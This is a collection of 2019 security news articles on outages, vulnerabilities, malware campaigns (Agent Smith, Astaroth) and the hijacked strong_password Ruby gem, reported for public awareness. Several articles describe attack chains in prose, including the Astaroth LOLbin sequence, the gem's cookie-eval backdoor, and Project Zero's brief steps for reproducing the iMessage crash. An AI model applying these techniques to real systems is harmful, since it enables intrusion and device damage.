Tech News - Security

On July 2, 2019, Cloudflare suffered a major outage due to a massive spike in CPU utilization in the network. Ten days after the outage, on July 12, Cloudflare’s CTO John Graham-Cumming, has released a report highlighting the details about how the Cloudflare service went down for 27 minutes. During the outage, the company speculated the reason to be a single misconfigured rule within the Cloudflare Web Application Firewall (WAF), deployed during a routine deployment of new Cloudflare WAF Managed rules. This speculation turns out to be true and caused CPUs to become exhausted on every CPU core that handles HTTP/HTTPS traffic on the Cloudflare network worldwide. Graham-Cumming said they are “constantly improving WAF Managed Rules to respond to new vulnerabilities and threats”. The CPU exhaustion was caused by a single WAF rule that contained a poorly written regular expression that ended up creating excessive backtracking. Source: Cloudflare report The regular expression that was at the heart of the outage is : Graham-Cumming says Cloudflare deploys dozens of new rules to the WAF every week, and also have numerous systems in place to prevent any negative impact of that deployment. He shared a list of vulnerabilities that caused the major outage. What’s Cloudflare doing to mend the situation? Graham-Cumming said they had stopped all release work on the WAF completely and are following some processes: He says, for longer-term, Cloudflare is “moving away from the Lua WAF that I wrote years ago”. The company plans to port the WAF to use the new firewall engine, which provides customers the ability to control requests, in a flexible and intuitive way, inspired by the widely known Wireshark language. This will make the WAF both faster and add yet another layer of protection. Users have appreciated Cloudflare’s efforts in taking immediate calls for the outage and being completely transparent about the root cause of it with a complete post mortem report. https://twitter.com/fatih/status/1150014793253904386 https://twitter.com/nealmcquaid/status/1150754753825165313 https://twitter.com/_stevejansen/status/1150928689053470720 “We are ashamed of the outage and sorry for the impact on our customers. We believe the changes we’ve made mean such an outage will never recur,” Graham-Cumming writes. Read the complete in-depth report by Cloudflare on their blog post. How Verizon and a BGP Optimizer caused a major internet outage affecting Amazon, Facebook, CloudFlare among others Cloudflare adds Warp, a free VPN to 1.1.1.1 DNS app to improve internet performance and security Cloudflare raises $150M with Franklin Templeton leading the latest round of funding

Europe’s satellite navigation system, Galileo, is suffering a major outage since July 11, nearing 100 hours of downtime, due to a “technical incident related to its ground infrastructure”, according to the European GNSS (Global Navigation Satellite System) Agency or GSA. Funded by the EU, the Galileo program went live with initial services in December 2016 after 17 years of development. This program was launched to avoid the EU’s reliance on the US Air Force's Global Positioning System (GPS) for commercial, military and other applications like guiding aircraft, and also on Russian government's GLONASS. The Galileo satellite network is presently being used by satnavs, financial institutions and more. It provides both free and commercial offerings and is widely used by government agencies and private companies for navigation and search and rescue operations. GSA’s service status page highlights that 24 of the 26 Galileo satellites are listed as "not usable," while the other two are listing the status of "testing". Source: ZDNet The outage means the satellites may not be able to provide timing or positioning data to smartphones or other devices in Europe that use the system. According to BBC, all of the affected users will hardly notice the outage as their devices “will be relying instead on the data coming from the American Global Positioning System (GPS). They will also depend on the sat-nav chip they have installed, cell phones and other devices might also be making connections with the Russian (Glonass) and Chinese (Beidou) networks”. On July 11, the GSA released an advisory notifying users that the Galileo satellite signals “may not be available nor meet the minimum performance levels”. They also warned users that these systems “should be employed at users’ own risk”. On Saturday, July 13, the GSA warned users Another stern warning by the GSA said the Galileo was experiencing a full-service outage and that "signals are not to be used." On July 14, GSA said the outage affected only the Galileo navigational and satellite-based timing services. However, "the Galileo Search and Rescue (SAR) service -- used for locating and helping people in distress situations for example at sea or mountains -- is unaffected and remains operational." “Experts are working to restore the situation as soon as possible. An Anomaly Review Board has been immediately set up to analyze the exact root cause and to implement recovery actions”, GSA added. “Galileo is still in a roll-out, or pilot phase, meaning it would not yet be expected to lead critical applications”, BBC reports. A GSA spokesperson told BBC News, "People should remember that we are still in the 'initial services' phase; we're not in full operation yet”. However, according to Inside GNSS, a specialist sat-nav site, the problem may be with the Precise Timing Facility(PTF), a ground station in Italy that gives each satellite in the system an accurate time reference. “time has an impact on the whole constellation!”, Inside GNSS adds. According to ZDNet, “The downtime also comes after widespread GPS outages were reported across Israel, Iran, Iraq, and Syria at the end of June. Israeli media blamed the downtime on Russian interference, rather than a technical problem”. https://twitter.com/planet4589/status/1150638285640912897 https://twitter.com/aallan/status/1150427275231420417 https://twitter.com/LeoBodnar/status/1150338536517881856 To know more about this news in detail, head over to Europe GSA’s official blog post. Twitter experienced major outage yesterday due to an internal configuration issue Stripe’s API suffered two consecutive outages yesterday causing elevated error rates and response times Why did Slack suffer an outage on Friday?

The recent Windows 7 ‘security-only’ update also includes Telemetry components, which users may be unaware of. It may be used to secretly monitor individual PC’s for “innocuous data collection to outright spyware”, according to ZDNet. Per Microsoft, the "Security-only updates" should not include quality fixes or diagnostic tools, etc. other than sole security updates. This is because, in 2016, Microsoft divided Win7 and 8.1 patchings into two parts, a monthly rollup of updates and fixes and, for those who want only essential patches, and second, a Security-only update package. Why is this “security-only” update suspicious? What was surprising about this month's Security-only update, formally titled the "July 9, 2019—KB4507456 (Security-only update)," is that it bundled the Compatibility Appraiser, KB2952664, which is designed to identify issues that could prevent a Windows 7 PC from updating to Windows 10. An anonymous user commented on Woody Leonhard’s post on the July 2019 security update published on his website, AskWoody. Leonhard is a Senior Contributing Editor at InfoWorld, and Senior Editor at Windows Secrets. “Warning for group B Windows 7 users! The “July 9, 2019—KB4507456 (Security-only update)” is NOT “security-only” update. It replaces infamous KB2952664 and contains telemetry. Some details can be found in file information for update 4507456 (keywords: “telemetry”, “diagtrack” and “appraiser”) and under http://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=7cdee6a8-6f30-423e-b02c-3453e14e3a6e (in “Package details”->”This update replaces the following updates” and there is KB2952664 listed). It doesn’t apply for IA-64-based systems, but applies both x64 and x86-based systems.” “Microsoft included the KB2952664 functionality (known as the “Compatibility Appraiser”) in the Security Quality Monthly Rollups for Windows 7 back in September 2018. The move was announced by Microsoft ahead of time”, another user with the name @PKCano explains. The user further added, “With the July 2019-07 Security Only Quality Update KB4507456, Microsoft has slipped this functionality into a security-only patch without any warning, thus adding the “Compatibility Appraiser” and its scheduled tasks (telemetry) to the update. The package details for KB4507456 say it replaces KB2952664 (among other updates).” “Come on Microsoft. This is not a security-only update. How do you justify this sneaky behavior? Where is the transparency now?”, the user concluded. ZDNet states, “The Appraiser tool was offered via Windows Update, both separately and as part of a monthly rollup update two years ago; as a result, most of the declining population of Windows 7 PCs already has it installed”. Ed Bott, a technology writer at ZDNet, says that this update is benign and also that Microsoft is being truthful when they say "There is no GWX or upgrade functionality contained in this update." If so, why is Microsoft not briefing users about this update? Many users are confused about whether or not they should update their systems. A user commented on AskWoody, “So should this update be skipped or installed? This appears to pose a dilemma, at least right now. I hope that some weeks from now, by the time we are closer to a green DEFCON, this has been sorted out”. Another user speculated that this issue might be resolved in the next update, “Disabling (or deleting) these schedule tasks after installation (before reboot) should be enough to turn off the appraiser \Microsoft\Windows\Application Experience\ProgramDataUpdater \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser \Microsoft\Windows\Application Experience\AitAgent but it’s best to wait next month to see if the SO update comes clean” ZDNet states this might be because Windows 7 is nearing end-of-support date, which is on January 14, 2020, “It's also possible that Microsoft thinks it has a strong case for making the Compatibility Appraiser tool mandatory as the Windows 7 end-of-support date nears”. To know more about this news, visit Microsoft’s security update. Microsoft quietly deleted 10 million faces from MS Celeb, the world’s largest facial recognition database Microsoft’s Xbox team at E3 2019: Project Scarlett, AI-powered Flight Simulator, Keanu Reeves in Cyberpunk 2077, and more Debian GNU/Linux port for RISC-V 64-bits: Why it matters and roadmap

For most of us, it is difficult to remember passwords across multiple devices and accounts. Also, if one account gets hacked, then attackers can manage to gain access to all the other accounts. Even though features like two-factor authentication (2FA) exist but not many use them. To make things simpler for its customers, Microsoft has introduced a "Make your device passwordless” feature in its Windows 10 devices. Just two days ago, the team at Microsoft announced Windows 10 Insider Preview Build 18936 in the Fast ring. The test build comes with a new sign-in option, "Make your device passwordless" in Settings. This means PCs can use Windows Hello face authentication, fingerprints, or a PIN code. The password option will no longer be there on the login screen if users opt-in for “Make your device passwordless” feature. https://twitter.com/msftsecurity/status/1064926596778401792 According to Microsoft, a PIN code is far more secure than a password, even though it appears to be very simple to use a four-digit code. The advantage is that it uses unknown variables and also the code is stored on a device and not shared online. Windows 10 stores the private key on a device with a Trusted Platform Module (TPM), which is also a secure chip that keeps a PIN local to the device only.  In case of a server being compromised or a password being stolen, an attacker can access the user’s device or account. But such an attack wouldn’t be effective with a Windows Hello PIN because the passwordless feature will still work through Azure Active Directory. It will further lock down business devices and protect valuable data by removing the password. This feature is currently available only for a set of Fast Ring Insiders and will be made available for others later this week. Users need a FIDO2-compatible security key for trying out these new capabilities. Microsoft has made public preview of FIDO2 security keys support in Azure Active Directory, available. It seems the company has been trying to convince Windows 10 users to opt into two-factor authentication processes such as basic SMS, Windows Hello, a separate Microsoft Authenticator app, or even physical security keys with the FIDO2 standard.  Microsoft Defender ATP detects Astaroth Trojan, a fileless, info-stealing backdoor Microsoft will not support Windows registry backup by default, to reduce disk footprint size from Windows 10 onwards Microsoft is seeking membership to Linux-distros mailing list for early access to security vulnerabilities            

Two days ago, Check Point researchers reported a new mobile malware attack called ‘Agent Smith’ which infected around 25 million Android devices. This malware is being used for financial gains through the use of malicious advertisements. The malware, concealed under the identity of a Google related app, exploited known Android vulnerabilities and automatically replaced installed apps with their malicious versions, without any consent of the user. The primary targets of this malware are based in Asian countries, especially India with over 15 million infected devices, Pakistan, Bangladesh, Saudi Arabia, UK and around 300k devices infected in the U.S. Currently, no malicious apps remain on the Google Play Store. However, before being removed, the malicious apps were downloaded over 10 million times. Researchers have estimated over 2.8 billion infections in total, on around 25 Million unique devices. Image Source: Check Point Research How Agent Smith infected Android apps A preliminary investigation revealed that the app strongly resembled Janus vulnerability abuse which was discovered in 2017 and allowed attackers to modify the code in Android applications without affecting their signatures. These malicious apps had the ability to hide their app icons and claim to be Google related updaters or vending modules. Check Point researchers found that  Agent Smith’s attack also resembled previous malware campaigns against Android apps, like Gooligan, HummingBad, and CopyCat. The Agent Smith malware basically attacks in a step by step manner: Image Source: Check Point Research Firstly, a dropper app attracts a victim to install itself voluntarily. The dropper has an inbuilt Feng Shui Bundle which works as an encrypted asset file. The dropper variants include photo utility, games, or sex-related apps. Next, the dropper automatically decrypts and installs its core malware APK, which is usually disguised as Google Updater, Google Update for U or ‘com.google.vending’.  This core malware APK is then used to conduct malicious patching and app updates. The core malware’s icon is hidden from the user, at all times. Lastly, the core malware extracts the device’s installed app list. If the malware finds apps like Whatsapp, Flipkart, Jio, Truecaller, etc on its prey list (hard-coded or sent from C&C server), the malware extracts the base APK of the target innocent app on the device. Next, the malware patches the APK with malicious ads modules. The base APK is then installed back, making it seem like an update. During the final update installation process, Agent Smith relies on the Janus vulnerability to bypass Android’s APK integrity checks. Finally, Agent Smith hijacks the compromised user apps, to show malicious advertisements. The hackers have used Agent Smith for financial gain only until now. However, with its ability to hide its icon from the launcher and successfully impersonate any popular existing app on a device, Agent Smith can cause serious harms like banking credential theft, shopping, and other sensitive apps. It has also come to light that Google had fixed Janus vulnerability, in 2017 but the fix has not made its way onto every Android phone. “Android users should use ad blocker software, always update their devices when prompted, and only download apps from the Google Play Store”, said Dustin Childs, the communications manager at a cybersecurity company Trend Micro. Many Android users have expressed their concern about the Agent Smith malware attack. https://twitter.com/TMWB1/status/1149337833695600640 https://twitter.com/AkiSolomos/status/1149487532272312324 Few iOS users, now say that its Google’s security vulnerabilities that make users opt for iOS phones. A Redditor comments, “This is unfortunately why I am still an Apple customer. I do not trust android to keep my information safe. Hey Google, how about I pay you a $15 per month subscription and you stop using spyware on me?” According to the researchers, the malware appears to be run by a Chinese Internet company located in Guangzhou that claims to help Chinese Android developers publish and promote their apps on overseas platforms. Check Point researchers have submitted their report to Google and law enforcement units, to facilitate further investigation. The names of the malicious actors have not yet been revealed. Google has not yet released any official statement warning Android users about the Agent Smith malware attack. For more details about the attack, head over to Check Point research page. An IoT worm Silex, developed by a 14 year old resulted in malware attack and taking down 2000 devices China is forcing tourists crossing Xinjiang borders to install an Android app that sends personal information to authorities, reports the Vice News React Native 0.60 releases with accessibility improvements, AndroidX support, and more

Yesterday, the Atlassian Support released the Jira security advisory affecting Jira Server and Jira Data Center. This advisory reveals a critical severity security vulnerability, labeled as CVE-2019-11581, which was introduced in version 4.4.0 of Jira Server and Jira Data Center. How can one exploit this vulnerability? For this issue to be exploitable, the attacker needs to meet any one of the following conditions: An SMTP server configured in Jira and the Contact Administrators Form is enabled, which will allow the attackers to exploit this issue without authentication. An SMTP server configured in Jira and an attacker has "JIRA Administrators" access, where attackers can exploit the issue using  JIRA Administrators’ credentials. In any of the cases, exploitation of this issue helps an attacker to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. The official post reads, “All versions of Jira Server and Data Center from 4.4.0 before 7.6.14 (the fixed version for 7.6.x), from 7.7.0 before 7.13.5 (the fixed version for 7.13.x), from 8.0.0 before 8.0.3 (the fixed version for 8.0.x), from 8.1.0 before 8.1.2 (the fixed version for 8.1.x), and from 8.2.0 before 8.2.3 are affected by this vulnerability.” To address this issue, the team has fixed this vulnerability in the 8.2.3, 8.1.2, 8.0.3, 7.13.5, 7.6.14 versions of Jira Server and Jira Data Center. Atlassian recommends that users upgrade to the latest version. How can users quickly mitigate this issue? For mitigating, users can first disable the Contact Administrators Form and then also block the /secure/admin/SendBulkMail!default.jspa endpoint from being accessed. This can be easily achieved by denying access in the reverse-proxy, load balancer, or Tomcat directly. However, blocking the SendBulkMail endpoint will prevent Jira Administrators from being able to send bulk emails to users. Hence, after upgrading Jira, users can re-enable the Administrator Contact Form, and unblock the SendBulkMail endpoint. To know more about this news, check out Jira security advisory. JIRA 101 Gadgets in JIRA Securing your JIRA 4

As per the reports from ZDNet, security researchers from CyberMDX, a healthcare cybersecurity firm found vulnerabilities in two models of hospital anesthesia machines manufactured by General Electric (GE). The two vulnerable devices are GE Aestiva and GE Aespire, models 7100 and 7900 and according to the researchers, the vulnerabilities reside in the two devices' firmware. Also, the US Department of Homeland Security's Industrial Control Systems and Cyber Emergency Response Team (ICS-CERT) issued a medical advisory for this vulnerability CVE-2019-10966. This vulnerability has been assigned 5.3 points as the CVSS score that indicates medium severity as per the ICS-CERT reports.   According to the researchers, attackers on the same network as the devices can send remote commands that can alter devices' settings. In a statement to ZDNet, a CyberMDX researcher told, "There is simply a lack of authentication."  He further added, "The mentioned commands are supported by design. Some of them are only supported on an earlier version of the protocol, however there is another command that allows changing the protocol version (for backward compatibility). After sending a command to change the protocol version to an earlier one, an attacker can send all other commands." The researcher claims that the commands can be used for making unauthorized adjustments to the anesthetic machines' gas composition which includes modifying the concentration of oxygen, CO2, N2O, and other anesthetic agents, or the gas' barometric pressure. If attackers get access to hospital’s network where either of these devices is connected to a terminal server, they can possibly break into the machine without knowing its IP address or location. And they can remotely change parameters without authorization and make unauthorized adjustments. According to the CyberMDX researchers such unauthorized modifications can put patients at risk. Attackers can also silence device alarms for low or high levels of various agents and modify timestamps inside logs. In a statement to ZDNet, Elad Luz, Head of Research at CyberMDX said, "The potential for manipulating alarms and gas compositions is obviously troubling." Luz further added, "More subtle but just as problematic is the ability to alter timestamps that reflect and document what happened in surgery." But as per a statement by GE Healthcare, the vulnerability is not in the device itself and this particular situation doesn't grant access to data or pose a direct risk to patients.  The GE Healthcare statement reads,“While the anesthesia device is in use, the potential gas composition parameter changes, potential device time change, or potential remote alarm silencing actions will not interfere in any way with the delivery of therapy to a patient at the point of delivery, and do not pose any direct clinical harm” In an email to ZDNet, GE explained the mitigations and according to them the vulnerabilities can be avoided if the anesthesia machines aren't connected to a hospital's network. In case the anesthesia machines aren't connected to a hospital network, then they can't be exploited, even if a hacker has access to a hospital's network. Microsoft is seeking membership to Linux-distros mailing list for early access to security vulnerabilities Deepfakes House Committee Hearing: Risks, Vulnerabilities and Recommendations Netflix security engineers report several TCP networking vulnerabilities in FreeBSD and Linux kernels        

After the recent disclosure of the vulnerability in Mac’s Zoom Client, Apple was quick to patch the vulnerable component. On July 9, the same day when security researcher, Jonathan Leitschuh revealed the vulnerability publicly, Apple released a patch that removes the local web server entirely and also allows users to manually uninstall Zoom. The Mac Zoom client vulnerability allowed any malicious website to initiate users’ camera and forcibly join a Zoom call without their authority. Apple said the update does not require any user interaction and is deployed automatically. How can Mac users ensure they get these updates? As the vulnerability was capable of re-installing the Zoom Client applications, Apple first stopped the use of a local web server on Mac devices. It then removed the local web server entirely, once the Zoom client was updated. Mac users were prompted in the Zoom user interface (UI) to update their client after the patch was deployed. After the complete update, the local web server will be completely removed on that device. Apple had added a new option to the Zoom menu bar that will allow users to manually and completely uninstall the Zoom client, including the local web server. Once the patch is deployed, a new menu option will appear that says, “Uninstall Zoom.” By clicking that button, Zoom will be completely removed from the user’s device along with the user’s saved settings. Plans to address ‘video on by default’ Apple has also announced a planned release this weekend (July 12) that will address another security concern, ‘video on by default’. With this July 12 release: First-time users who select the “Always turn off my video” box will automatically have their video preference saved. The selection will automatically be applied to the user’s Zoom client settings and their video will be OFF by default for all future meetings. Returning users can update their video preferences and make video OFF by default at any time through the Zoom client settings. Zoom spokesperson Priscilla McCarthy told TechCrunch, “We’re happy to have worked with Apple on testing this update. We expect the web server issue to be resolved today. We appreciate our users’ patience as we continue to work through addressing their concerns.” Regarding Apple’s quick action to patch the Zoom Client vulnerability, Leitschuh tweeted that their willingness to patch represented an “about face”. “it went from rationalizing its existing strategy to planning a fix in a matter of hours”, Engadget reports. https://twitter.com/JLLeitschuh/status/1148686921528414208 To know more about this news in detail, read Zoom blog. Apple plans to make notarization a default requirement in all future macOS updates Ian Goodfellow quits Google and joins Apple as a director of machine learning Apple to merge the iPhone, iPad, and Mac apps by 2021

The UK’s watchdog, Information Commissioner's Office (ICO) announced that it plans to impose a fine of more than £99 million ($124 million) under GDPR, on the popular hotel chain, Marriott International over a massive data breach which occurred last year. On November 19, 2018, Marriott revealed that the data breach occurred in Marriott’s Starwood guest database and that this breach was happening over the past four years and collected information about customers who made reservations in its Starwood subsidiary. The company initially said hackers stole the details of roughly 500 million hotel guests. However, with a further thorough investigation the number was later corrected to 383 million. This is ICO’s second announcement of imposing significant fines on companies involved in major data breaches. A few days ago, ICO declared its intentions of issuing British Airways a fine of £183.39M for compromising personal identification information of over 500,000 customers. According to ICO’s official website, “A variety of personal data contained in approximately 339 million guest records globally were exposed by the incident, of which around 30 million related to residents of 31 countries in the European Economic Area (EEA). Seven million related to UK residents.” Information Commissioner Elizabeth Denham, said, “The GDPR makes it clear that organizations must be accountable for the personal data they hold. This can include carrying out proper due diligence when making a corporate acquisition, and putting in place proper accountability measures to assess not only what personal data has been acquired, but also how it is protected.” “Personal data has a real value so organizations have a legal duty to ensure its security, just like they would do with any other asset. If that doesn’t happen, we will not hesitate to take strong action when necessary to protect the rights of the public,” she further added. In a filing with the US Securities Exchange Commission, yesterday, Marriott International’s President and CEO, Arne Sorenson, said, “We are disappointed with this notice of intent from the ICO, which we will contest. Marriott has been cooperating with the ICO throughout its investigation into the incident, which involved a criminal attack against the Starwood guest reservation database. “We deeply regret this incident happened. We take the privacy and security of guest information very seriously and continue to work hard to meet the standard of excellence that our guests expect from Marriott”, Sorenson added. He further informed that the Starwood guest reservation database that was attacked is no longer used for business operations. A few hours after Marriott revealed about the data breach last year, two lawsuits were filed against it. First, by two Oregon men: Chris Harris and David Johnson, for exposing their data, and the other lawsuit was filed in the state of Maryland by a Baltimore law firm Murphy, Falcon & Murphy.  The petitioners in the Oregon lawsuit claimed $12.5 billion in costs and losses; however, the petitioners for the Maryland lawsuit didn't specify the amount for damages they were seeking from Marriott. According to OregonLive’s post last year, “The lawsuit seeks $12.5 billion -- or $25 for each customer whose privacy may have been jeopardized after making a reservation with Starwood brand hotels, including W Hotels, St. Regis, Sheraton, and Westin”. “The $25 as a minimum value for the time users will spend canceling credit cards due to the Marriott hack”, OregonLive further reported. Many are happy with ICO’s decision of imposing fines on major companies that put customer data at risk. A user on Reddit has commented, “Finally!! I am hoping this is a trend and a game changer for the companies to better protect their customer information!”. Another user said, “Great news, The GDPR is working.” To know more about this news in detail, head over to ICO’s official website. Former Senior VP’s take on the Mariott data breach; NYT reports suspects Chinese hacking ties Facebook fails to fend off a lawsuit over data breach of nearly 30 million users Experts discuss Dark Patterns and deceptive UI designs: What are they? What do they do? How do we stop them?

Yesterday, the Microsoft Defender Advanced Threat Protection (ATP) Research Team shared details of a fileless malware campaign through which attackers were dropping Astaroth Trojan into the memory of infected computers. https://twitter.com/MsftSecIntel/status/1148262969710698498 Astaroth is a malware known for abusing living-off-the-land binaries (LOLbins) such as Windows Management Instrumentation Command-line (WMIC) to steal sensitive information including credentials, keystrokes, and other data. It sends stolen data to a remote attacker, who can misuse them to carry out financial theft or sell victim information in the cybercriminal underground. This trojan has been public since 2017 and has affected a few European and Brazilian companies. As of now, Microsoft has not disclosed whether any other user’s machine was compromised. What are fileless threats? Fileless malware attacks either run the payload directly in the memory or use already installed applications to carry out the attack. As these attacks use legitimate programs, they are very difficult to detect for most security programs and even for experienced security analysts. Andrea Lelli, a member of Microsoft Defender ATP Research Team, thinks that though these attacks are difficult to detect, they are certainly not undetectable. “There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can detect and stop,” he wrote in the blog post. How is the Astaroth Trojan attack implemented? During a standard review, Lelli observed that telemetry was showing a sudden increase in the use of WMIC tool to run a script. This made him suspicious of a fileless attack. Upon further investigation, he realized that the campaign was trying to run Astaroth backdoor directly into the memory. Here’s how the initial access and execution takes place using only system tools: Source: Microsoft The attack begins with a spear-phishing email containing a malicious link that redirects a user to an LNK file. When the user double-clicks on the LNK file, it triggers the execution of the WMIC tool with the “/Format” parameter. This allows the download and execution of a JavaScript code that in turn downloads payloads by abusing the Bitsadmin tool. The downloaded payloads are Base64-encoded and are decoded using the Certutil tool. While others remain encrypted, two of them are decoded to plain DLL files. The Regsvr32 tool loads one of the decoded DLLs, which then decrypts and loads other files until the Astaroth, the final payload is injected into the Userinit process. How does Microsoft Defender ATP detect and stop these attacks? Microsoft Defender ATP comes with several advanced technologies to “spot and stop a wide range of attacks.” It leverages protection capabilities from the cloud including metadata-based ML engine, behavior-based ML engine, AMSI-paired ML engine, file classification engine, among others. On the client-side, it includes protection techniques such as memory scanning engine, emulation engine, network engine, and more. Here’s a diagram depicting all the protection technologies Microsoft Defender ATP comes with: Source: Microsoft Check out the official post by Microsoft Defender ATP Research to know more in detail. Microsoft is seeking membership to Linux-distros mailing list for early access to security vulnerabilities 12 Visual Studio Code extensions that Node.js developers will love [Sponsored by Microsoft] 5 reasons Node.js developers might actually love using Azure [Sponsored by Microsoft]

A vulnerability in Mac’s Zoom Client allows any malicious website to initiate users’ camera and forcibly join a Zoom call without their authority. This vulnerability was publicly disclosed by security researcher, Jonathan Leitschuh, today. The flaw exposes up to 750,000 companies around the world using the video conferencing app on their Macs, to conduct day-to-day business activities. It also allows a website to launch a DoS (Denial of Service) attack on Macs by repeatedly joining a user to an invalid call. Even if one tries to uninstall the app from their devices, it can even re-install the app without user’s permission with the help of a localhost web server on the machine that should have installed the app at least once. https://twitter.com/OldhamMade/status/1148476854837415936 “This vulnerability leverages the amazingly simple Zoom feature where you can just send anyone a meeting link (for example https://zoom.us/j/492468757) and when they open that link in their browser their Zoom client is magically opened on their local machine”, Leitschuh writes. Leitschuh said that the vulnerability was responsibly disclosed on March 26, this year. This means the company had 90 days to fix this issue based on the disclosure policy. He had suggested a ‘quick fix’ which Zoom could have implemented by simply changing their server logic. However, Zoom first took 10 days to confirm the vulnerability and held a meeting about how the vulnerability would be patched, only 18 days before the end of the 90-day public disclosure deadline, i.e. June 11th, 2019. A day before the public disclosure, Zoom had only implemented the quick fix solution. “An organization of this profile and with such a large user base should have been more proactive in protecting their users from attack”, Leitschuh says. Leitschuh also mentioned the Tenable Remote Code Execution in Zoom security vulnerability which was only patched within the last 6 months. “Had the Tenable vulnerability been combined with this vulnerability it would have allowed RCE against any computer with the Zoom Mac client installed. If a similar future vulnerability were to be found, it would allow any website on the internet to achieve RCE on the user’s machine”, Leitschuh adds. According to ZDNet, “Leitschuh also pointed out to Zoom that a domain it used for sending out updates was about to expire before May 1, but the domain was renewed in late April”. In a statement to The Verge, Zoom said, the local webserver was developed “to save users some clicks after Apple changed its Safari web browser in a way that requires Zoom users to confirm that they want to launch Zoom each time”. Zoom defended their “workaround” and said it is a “legitimate solution to poor user experience, enabling our users to have seamless, one-click-to-join meetings, which is our key product differentiator.” The company said it would do some minor tweaking to the app this month. “Zoom will save users’ and administrators’ preferences for whether the video will be turned on, or not when they first join a call”, the company said. https://twitter.com/backlon/status/1148464344876716033 This move by Zoom is unfair towards users where they have to turn their cameras off and the company just escapes with a minor change to the app for such a serious security lapse issue where they should have taken a major step. Many are unhappy with the way Zoom is handling this vulnerability. https://twitter.com/chadloder/status/1148375915329495040 https://twitter.com/ticky/status/1148389970073096192 Users can patch the camera issue by themselves by updating their Mac and disabling the setting that allows Zoom to turn your camera on when joining a meeting. As mentioned earlier, the vulnerability may re-install the applications; hence, users are advised to run some terminal commands to turn off their web server. Leitschuh has explained these commands in detail in his blog post on Medium. Google researcher reveals an unpatched bug in Windows’ cryptographic library that can quickly “take down a windows fleet” Apple promotes app store principles & practices as good for developers and consumers following rising antitrust worthy allegations Google Project Zero reveals an iMessage bug that bricks iPhone causing repetitive crash and respawn operations

Last week, a developer Tute Costa notified Ruby users that the strong_password v0.0.7 rubygem has been hijacked. The malicious actor published v0.0.7 containing the malicious code, which enabled the attacker to execute remote code in production. As of now, the thread has been tweaked and the attacker’s RubyGems account has been locked. A strong_password is an entropy-based password strength used for checking Ruby and ActiveModel. How was the strong_password v0.0.7 hijack identified? While linking line by line to each library’s changeset, Costa noticed that the strong_password has changed from 0.0.6 to 0.0.7. Although the last changes in any branch in GitHub was from 6 months ago, Costa recalled that everything was up to date. Costa then downloaded the gem from RubyGems and compared its contents with its latest copy in GitHub. He found that at the end of the lib/strong_password/strength_checker.rb version 0.0.7 there was the following message: Image Source: With a Twist Dev Costa found that a malicious actor has used an empty account, with a different name than the maintainer’s. The malicious actor has published the gem, after receiving access to the particular gem. Later, Costa forwarded this thread to the strong_password maintainer’s email in GitHub. Brian McManus, the strong_password maintainer replied, “The gem seems to have been pulled out from under me. When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019.” How does the malicious code work? If the malicious code didn’t run before checking for the existence of the Z1 dummy constant, it injects a middleware that eval’s cookies named with an ___id suffix, only in production. It is surrounded by the empty exception handler _! function that’s defined in the hijacked gem. This opens the door to the attacker to silently execute remote codes in production. The malicious code also sends a request to a controlled domain with an HTTP header informing the infected host URLs. What is the current status of strong_password v0.0.7? Rafael França, the Ruby on Rails’ security coordinator has added asecurity@rubygems.org to the thread. Later André Arko, the founder of Ruby Together, tweaked the thread and locked the RubyGems account. McManus was later added back to the gem. Costa also notified users that he asked for a CVE identifier (Common Vulnerabilities and Exposures) to cve-request@mitre.org and received CVE-2019-13354. He used this CVE “to announce the potential issue in production installations to the rubysec/ruby-advisory-db project and the ruby-security-ann Google Group.” The community has been praising Tute Costa for his efforts in finding out about the hijack. https://twitter.com/mjos_crypto/status/1148153570631589889 A user on Hacker News states that “In light of vulnerabilities like these, I’m glad there are developers that spend time to make their apps more secure. Thus, making us all aware that issues like these are out there. Security is almost always just put off in exchange for features and security is most of the time taken for granted. It’s about time that we start taking it seriously. Kudos to you!” Many users are also skeptical about RubyGem’s security vulnerabilities. A user on Hacker News says, “There's still a lot to learn about this incident, but most likely the RubyGems account was compromised, allowing the attacker to upload whatever they wanted. Signed releases with a web of trust would be ideal, but I doubt we'll ever see that world. A simple and pragmatic solution would be to have the next version of bundler support the ability to only install packages published with 2 factor enabled, then the next major rails version default it to on, with plenty of advanced warning in 6.x/bundler. This still has plenty of gaps, such as an attacker being able to take over even with 2 factor, and then re-enabling it with their own keys, or RubyGems.org itself being compromised. It still represents a major upgrade in security for the entire Ruby ecosystem without causing much pain to authors and users.” Another comment reads, “Rubygem should contract an external auditor (security firm), this could go way deeper. Until they perform a thorough audit I will personally stay away from this project.” Why Ruby developers like Elixir Ruby ends support for its 2.3 series How Deliveroo migrated from Ruby to Rust without breaking production

A zero-day vulnerability in Apple's iMessage, which bricks an iPhone and survives hard resets was recently brought to light. A specific type of malformed message is sent out to a victim device, forcing users to factory-reset it again. The issue was first posted by Google Project Zero researcher, Natalie Silvanovich on the project’s issue page on April 19, 2019. Due to the usual 90-day disclosure deadline, the bug is held from public view until either 90 days had elapsed or a patch had been made broadly available to the public. On 4th July, Silvanovich revealed that the issue was fixed in the Apple iOS 12.3 update, thus making it public. Labelled as CVE-2019-8573 and CVE-2019-8664, this vulnerability causes a Mac to crash and respawn. Silvanovich says on an iPhone, this code is in Springboard and “receiving this message will cause Springboard to crash and respawn repeatedly, causing the UI not to be displayed and the phone to stop responding to input. The only way I could find to fix the phone is to reboot into recovery mode and do a restore. This causes the data on the device to be lost”. According to Forbes, “The message contains a property with a key value that is not a string, despite one being expected. Calling a method titled IMBalloonPluginDataSource _summaryText, the method assumes the key in question is a string but does not verify it is the case”.  The subsequent call for IMBalloonPluginDataSource replaceHandlewithContactNameInString calls for im_handleIdentifiers for the supposed string, which in turn results in a thrown exception.  For testing purposes, Silvanovich, in her patch update has shared three ways that she found to unbrick the device: wipe the device with 'Find my iPhone' put the device in recovery mode and update via iTunes (note that this will force an update to the latest version) remove the SIM card and go out of Wifi range and wipe the device in the menu Google Project Zero has also released instructions to reproduce the issue: install frida (pip3 install frida) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device in the local directory, run: python3 sendMessage.py Users should make sure their iPhone is up to date with the latest iOS 12.3 update. Read more about the vulnerability on Google Project Zero’s issue page. Approx. 250 public network users affected during Stack Overflow's security attack Google researcher reveals an unpatched bug in Windows’ 